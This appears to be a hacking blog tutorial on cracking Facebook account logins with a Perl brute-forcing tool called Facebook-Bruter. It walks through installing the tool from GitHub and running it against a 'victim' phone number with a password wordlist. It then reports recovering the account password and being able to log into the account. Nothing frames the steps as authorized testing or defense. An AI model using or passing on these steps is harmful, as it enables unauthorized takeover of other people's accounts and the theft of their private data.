Sponsored
Dictionary and Bruteforce

Crack Facebook Account Login via Facebook-Bruter

Hey Folks, in this tutorial we are going to talk about an another facebook brute forcing tool called β€œFacebook-Bruterβ€œ. Basically facebook bruter is a facebook cracking tool from which you can crack login of facebook accounts using dictionary or wordlist. You have to provide the victim account username, email or phone number as well as a wordlist, which should contain millions of passwords. Thta’s it πŸ™‚ !!

Lets take a look πŸ™‚ !!

Install Perl Tool

This tool is basically coded in Perl language, so we have to install Perl tool to use this tool.

apt install perl

Installation

Simply first we install this tool from gitub by using git command then go to directory of this tool and boot it by using the perl command.

git clone https://github.com/imadoxhunter/Facebook-Bruter.git
cd Facebook-Bruter/
perl Facebook-Bruter.pl

Using the previous one command, we can also see all the features of this tool.

perl Facebook-Bruter.pl

Brute Force Attack

All you have to do is change the target email address and wordlist location according to your from given command and execute it.

Usage πŸ™‚ !! perl Facebook-Bruter.pl < email/number > < wordlist >

perl Facebook-Bruter.pl 9891924836 /root/pas.txt

Done πŸ˜€ !! As you can see, we have got the correct password for the user account from wich we can login to his account.

About the Author
Shubham Goyal Certified Ethical Hacker, information security analyst, penetration tester and researcher. Can be Contact on Linkedin.
Sponsored
Shubham Goyal

A keen learner and passionate IT student. He has done Web designing, CCNA, RedHat, Ethical hacking, Network & web penetration testing. Currently, he is completing his graduation and learning about Red teaming, CTF challenges & Blue teaming.

Recent Posts

Gau (GetAllUrls) – Find Known and Hidden URL

The gau (Get All URLs) tool is a versatile open-source utility that collects URLs from…

4 months ago

Jsluicepp – Burp Extension for JS Secrets – BugBountyTip

Jsluice++ is a Burp Suite extension designed for passive and active scanning of JavaScript traffic…

9 months ago

Bypassing Firewalls (WAF) with XSS Payloads

Hey Folks :) !! In this tutorial, we will describe some of the techniques commonly…

10 months ago

Termux Cheat Sheet for Hackers

Hey Folks :) !! In this article, we present the "Termux Cheat Sheet for Hackers"…

1 year ago

Cracking the X-Factor in Cybersecurity: How Humans are Protecting the Systems?

Amid the rapid advancement of technology, the significance of human involvement in cybersecurity frequently goes…

2 years ago

Cariddi – Hidden Endpoint Finder for Bug Hunting

Hey Folks, we are back today after such a long break, but don't worry we…

3 years ago
Sponsored

This website uses cookies.